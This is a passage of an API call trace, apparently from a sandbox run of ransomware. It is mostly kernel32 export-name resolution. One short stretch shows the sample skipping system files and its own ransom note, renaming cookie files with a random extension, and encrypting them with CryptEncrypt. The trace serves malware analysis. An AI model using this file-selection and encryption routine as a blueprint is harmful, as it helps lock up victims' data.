[0079.382] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.382] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.383] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.383] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.383] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.383] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.383] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.383] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.383] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.383] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.383] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.383] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.383] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.383] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.383] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.383] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.383] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.383] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.383] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.383] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.383] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.384] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.384] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.384] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.384] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.384] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.384] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.384] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.384] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.384] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.384] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.384] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.384] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.384] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.384] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.384] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt") returned 115 [0079.385] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ") returned 123 [0079.385] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6ighlz"), dwFlags=0x0) returned 1 [0079.385] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.386] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.386] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.386] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61093ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61093ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x61093ba0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[1].txt", cAlternateFileName="5P12F9~1.TXT")) returned 1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="autorun.inf") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="boot.ini") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="desktop.ini") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="ntuser.dat") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="iconcache.db") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="bootsect.bak") returned -1 [0079.386] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.387] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="thumbs.db") returned -1 [0079.387] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt", lpString2="Bootfont.bin") returned -1 [0079.387] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[1].txt") returned 34 [0079.387] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.387] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.387] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.387] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.387] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.387] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[1].txt") returned 34 [0079.387] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.387] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@google[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" [0079.387] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.388] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=598) returned 1 [0079.388] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.388] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.389] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.389] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.389] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.390] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.390] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.390] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.390] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.391] CloseHandle (hObject=0x464) returned 1 [0079.391] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.391] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.391] CloseHandle (hObject=0x0) returned 0 [0079.391] CloseHandle (hObject=0x460) returned 1 [0079.392] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.393] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.393] GetTickCount () returned 0x114c572 [0079.393] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.393] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.393] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.393] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.394] lstrlenA (lpString="kernel32.dll") returned 12 [0079.394] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.394] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.394] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.394] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.394] lstrlenA (lpString="ADDATOMA") returned 8 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.394] lstrlenA (lpString="ADDATOMW") returned 8 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.394] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.394] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.394] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.394] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.394] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.395] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.395] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.395] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.395] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.395] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.395] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.395] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.395] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.395] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.395] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.395] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.395] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.395] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.395] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.395] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.395] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.395] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.395] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.395] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.396] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.396] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.396] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.396] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.396] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.396] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.396] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.396] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.396] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.396] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.396] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.396] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.396] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.396] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.396] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.396] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.396] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.396] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.396] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.397] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.397] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.397] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.397] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.397] lstrcpyA (in: lpString1=0x3f2c7fc, 